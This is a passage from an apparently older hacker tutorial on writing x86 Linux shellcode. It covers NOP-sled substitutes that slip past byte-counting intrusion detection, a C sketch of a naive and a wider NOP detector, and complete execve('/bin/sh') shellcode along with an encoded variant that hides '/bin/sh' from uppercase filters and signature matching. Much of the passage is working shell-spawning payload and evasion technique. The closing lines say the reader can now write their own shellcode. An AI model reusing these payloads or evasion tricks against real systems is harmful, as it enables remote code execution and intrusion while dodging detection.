coded as: \x40,\x43,\x41,\x42 
You can of course mix them up as well.


Another nice way would be something like:
movl $0x41414141,%eax

coded as: \xb8\x41\x41\x41\x41 
Let's say you land on a \x41 -> the CPU will increment %ecx until it reaches the \xb8,
from there on %eax will be loaded with 0x41414141

You could mix this instruction with a
movl $0x43434343,%ebx 

coded as: \xbb\x43\x43\x43\x43 this would have the same result.
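
Seen from the defender's side, the naive check described at the start of this section is
little more than a byte counter. The following C sketch ( function names are made up, and
real IDS signatures are more involved ) shows why counting only \x90 misses the
substitutes listed above.

```c
#include <assert.h>
#include <stddef.h>

/* Counts classic NOP bytes (0x90) in a packet. */
size_t count_nops(const unsigned char *pkt, size_t len)
{
    size_t i, hits = 0;

    assert(pkt != NULL || len == 0);
    for (i = 0; i < len; i++)
        if (pkt[i] == 0x90)
            hits++;
    return hits;
}

/* Also counts the one byte inc instructions for %eax, %ecx, %edx and %ebx
 * (0x40 to 0x43), which behave like NOPs inside a sled. */
size_t count_nop_like(const unsigned char *pkt, size_t len)
{
    size_t i, hits = 0;

    assert(pkt != NULL || len == 0);
    for (i = 0; i < len; i++)
        if (pkt[i] == 0x90 || (pkt[i] >= 0x40 && pkt[i] <= 0x43))
            hits++;
    return hits;
}
```

A sled made of \x40\x43\x41\x42 scores 0 with count_nops but 4 with count_nop_like. The
wider check in turn matches the ASCII characters @, A, B and C, so it will also fire on
plain text.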




6.1. Hiding the "/bin/sh" string:

Another way of identifying an exploit attempt might be searching for a string like "/bin/sh".
Hiding the string is also applicable to, let's say, an imapd exploit, or generally to a program
that converts all lowercase characters to uppercase: 



#include <stdio.h>
#include <string.h>
#include <ctype.h>

int main(int argc,char *argv[]) {
	
	char buf[512];
	size_t i;
	
	if(argc < 2)
		return 1;
	
	for(i=0;i<strlen(argv[1]);i++) {
		argv[1][i] = toupper( (unsigned char)argv[1][i] );
	}
	printf("%s\n",argv[1]);
	return 0;
}


Our general shell spawning shellcode is: 

"\xeb\x1d"                  // jmp     0x1d
"\x5b"                      // popl    %ebx
"\x31\xc0"                  // xorl    %eax,%eax
"\x89\x5b\x08"              // movl    %ebx,0x8(%ebx)
"\x88\x43\x07"              // movb    %al,0x7(%ebx)
"\x89\x43\x0c"              // movl    %eax,0xc(%ebx)
"\x8d\x4b\x08"              // leal    0x8(%ebx),%ecx
"\x8d\x53\x0c"              // leal    0xc(%ebx),%edx
"\xb0\x0b"                  // movb    $0xb,%al
"\xcd\x80"                  // int     $0x80
"\x31\xc0"                  // xorl    %eax,%eax
"\x21\xd8"                  // andl    %ebx,%eax
"\x40"                      // incl    %eax
"\xcd\x80"                  // int     $0x80
"\xe8\xde\xff\xff\xff"      // call    -0x22
"/bin/sh";


Lowercase characters are between \x61 (a) and \x7a (z).

Our shellcode does not contain any lowercase characters except for the "/bin/sh" string.
The "/bin/sh" string in hex looks like: \x2f\x62\x69\x6e\x2f\x73\x68
So if we subtract 0x20 from all lowercase characters in this string it looks like: 
"\x2f\x42\x49\x4e\x2f\x53\x48" ( "/BIN/SH" ), which a toupper leaves untouched. 
But we have to change this value back at runtime, otherwise we are about to execute "/BIN/SH" 
instead of "/bin/sh". This is done by adding $0x20 to "bin" and to "sh". Due to the fact
that "/" is not a letter we can leave it unchanged. 
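
The round trip can be tried out in plain C. This is a small sketch; upcase and
restore_bin_sh are names made up for this example, and the offsets 1,2,3,5,6 are simply
the positions of the letters within the string.

```c
#include <assert.h>
#include <ctype.h>
#include <string.h>

/* What the filtering program does to our input. */
void upcase(char *s)
{
    for (; *s != '\0'; s++)
        *s = (char)toupper((unsigned char)*s);
}

/* Adds 0x20 back to the five letters of "/BIN/SH",
 * leaving the two slashes at offsets 0 and 4 alone. */
void restore_bin_sh(char *s)
{
    static const int letters[] = {1, 2, 3, 5, 6};
    size_t i;

    assert(strlen(s) == 7);
    for (i = 0; i < sizeof letters / sizeof letters[0]; i++)
        s[letters[i]] += 0x20;
}
```

Feeding "/bin/sh" through upcase gives "/BIN/SH"; restore_bin_sh turns it back into
"/bin/sh". Sending the uppercase form in the first place means the filter has nothing
left to change.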


static char hide[]=
"\xeb\x31"               //     jmp    0x31
"\x5b"                   //     popl   %ebx
"\x80\x43\x01\x20"       //     addb   $0x20,0x1(%ebx)   <- we simply add 0x20 to our string
"\x80\x43\x02\x20"       //     addb   $0x20,0x2(%ebx)
"\x80\x43\x03\x20"       //     addb   $0x20,0x3(%ebx)
"\x80\x43\x05\x20"       //     addb   $0x20,0x5(%ebx)
"\x80\x43\x06\x20"       //     addb   $0x20,0x6(%ebx)
"\x31\xc0"               //     xorl   %eax,%eax
"\x89\x5b\x08"           //     movl   %ebx,0x8(%ebx)
"\x88\x43\x07"           //     movb   %al,0x7(%ebx)
"\x89\x43\x0c"           //     movl   %eax,0xc(%ebx)
"\x8d\x4b\x08"           //     leal   0x8(%ebx),%ecx
"\x8d\x53\x0c"           //     leal   0xc(%ebx),%edx
"\xb0\x0b"               //     movb   $0xb,%al
"\xcd\x80"               //     int    $0x80
"\x31\xc0"               //     xorl   %eax,%eax
"\x21\xd8"               //     andl   %ebx,%eax
"\x40"                   //     incl   %eax
"\xcd\x80"               //     int    $0x80
"\xe8\xca\xff\xff\xff"   //     call   -0x36
"\x2f\x42\x49\x4e\x2f\x53\x48";  // our hidden /bin/sh string


If you have any instruction containing a lowercase character in your shellcode, substitute 
this instruction with some other logically equivalent one. 


=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=
7. Afterword: 

Armed with this knowledge you should now be able to write your own shellcode.
I hope you enjoyed reading this paper, otherwise sorry for wasting your time.
Feel free to mail me <pr10n@u-n-f.com>


Written by pr1 ( pr10n@u-n-f.com ).


greets to: teso, usf and thc

-----------------------------------------------------------------------------------------------
\x00
-----------------------------------------------------------------------------------------------